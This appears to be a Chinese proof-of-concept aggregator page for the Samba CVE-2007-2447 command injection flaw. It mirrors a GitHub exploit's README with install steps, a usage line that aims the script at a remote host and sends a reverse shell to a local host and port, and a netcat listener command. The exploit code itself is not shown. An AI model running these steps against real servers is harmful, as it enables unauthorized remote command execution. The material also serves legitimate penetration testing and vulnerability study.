POC详情: b4e57c5014e36bb6ea7bf46f2c6ad00aaea9da8d

来源
https://github.com/0xKn/CVE-2007-2447
关联漏洞
标题: Samba MS-RPC Shell命令注入漏洞 (CVE-2007-2447)
描述:Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。 Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执
介绍
# CVE-2007-2447 - username map script

"The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management."



## Exploit

### Installation:

**[*]** This exploit requires Python 3.7 or higher

``` 
python3 -m pip install pysmb 
```

### Usage:

```
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
```
* ```--rhost``` -- Remote Host
* ```--lhost``` -- Local Host
* ```--lport``` -- Local Port
* ```--rport``` -- Remote Port **[*]** _Optional. default=445_

Do not forget to start your listener:

```
nc -lvnp 4444
```

## PoC

![image](https://user-images.githubusercontent.com/80174242/110221372-e9226500-7ec3-11eb-850b-77e6c7711707.png)
文件快照

 [4.0K]  /data/pocs/b4e57c5014e36bb6ea7bf46f2c6ad00aaea9da8d
├── [1.1K]  CVE-2007-2447.py
└── [1.0K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。